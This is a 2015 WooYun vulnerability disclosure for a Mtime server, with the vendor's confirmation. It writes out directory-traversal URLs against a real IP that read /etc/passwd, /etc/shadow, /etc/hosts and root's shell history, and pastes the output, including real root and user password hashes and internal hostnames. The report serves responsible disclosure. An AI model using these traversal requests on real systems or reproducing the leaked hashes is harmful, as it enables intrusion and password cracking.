当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111056

漏洞标题:时光网某台服务器任意文件读取(root密码hash泄露)

相关厂商:时光网

漏洞作者: 路人甲

提交时间:2015-04-29 14:02

修复时间:2015-06-13 17:06

公开时间:2015-06-13 17:06

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-29: 细节已通知厂商并且等待厂商处理中
2015-04-29: 厂商已经确认,细节仅向厂商公开
2015-05-09: 细节向核心白帽子及相关领域专家公开
2015-05-19: 细节向普通白帽子公开
2015-05-29: 细节向实习白帽子公开
2015-06-13: 细节向公众公开

简要描述:

任意文件读取

详细说明:

不能直接在浏览器上访问,需要使用一些请求发送工具,不会把../取消掉的。可以使用fiddler的composer测试
http://59.151.32.24/../../../../../../../../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mtime:x:500:500::/home/mtime:/bin/bash
ntp:x:501:501::/home/ntp:/sbin/nologin
zabbix:x:502:502::/home/zabbix:/sbin/nologin


http://59.151.32.24/../../../../../../../../../../../../../../../../../etc/hosts

192.168.0.165   jx-gfs01.inc.mtime.com
192.168.0.48 jx-gfs00.inc.mtime.com


root权限:
http://59.151.32.24/../../../../../../../../../../../../../../../../../etc/shadow

root:$6$NR8MNAMR$6bJiyDAY1vxlcjl2NURXMDQjrZhUQQSNi.zg3lClhHg9U9MWD2eK7oPJiR9gVwI82ELJxq4VWW1Byb2AZtgQl1:16458:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
nobody:*:15980:0:99999:7:::
vcsa:!!:16457::::::
saslauth:!!:16457::::::
sshd:!!:16457::::::
mtime:$6$/rEJHchC$tIKQBclZnWglJrmGvV3EgzkPj8vxK/BENYXSn7xIQ4.UZ4BLcAONBZxZgnwE5H2ZCApMZe2TbWtAFBIy.0NyI0:16458:0:99999:7:::
ntp:!!:16457:0:99999:7:::
zabbix:!!:16457:0:99999:7:::


http://59.151.32.24/../../../../../../../../../../../../../../../../../root/.bash_history

vim /etc/crontab 
vi /etc/crontab
vi /home/mtime/optools/docker.sh
exit
ls
scp root@192.168.0.180:/etc/init.d/real /etc/init.d/
vim /etc/init.d/real
vi /etc/init.d/real
/etc/init.d/real start
ifconfig
ls
cd /home/mtime/log-service/
ls
cd v201501301515/
ls
vi config/app.conf
./log-service -s stop
cd ..
./v201501301515/log-service
netstat -lnpt
ifconfig
exit
ifconfig
cat /etc/rc.local
chkconfig --list
chkconfig --add real
chkconfig real on
/etc/init.d/real stop
/etc/init.d/real start
ifconfig
init 6
ifconfig
cd /home/mtime/
ls
cd log-service/
ls
./v201501301515/log-service
netstat -lnpt
df -h
ls
vi /home/mtime/optools/docker.sh
ls
exit
cat /etc/rc.local
exit
df -h
cat /etc/rc.local
vim /etc/hosts
vi /etc/hosts
rpm -qa | grep fuse


泄露一些配置文件,以及var/log/下的一些日志,不再证明了

漏洞证明:

见详细

修复方案:

看李姐姐的博客
http://www.lijiejie.com/python-django-directory-traversal/

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-29 17:04

厂商回复:

我们会尽快处理,谢谢

最新状态:

暂无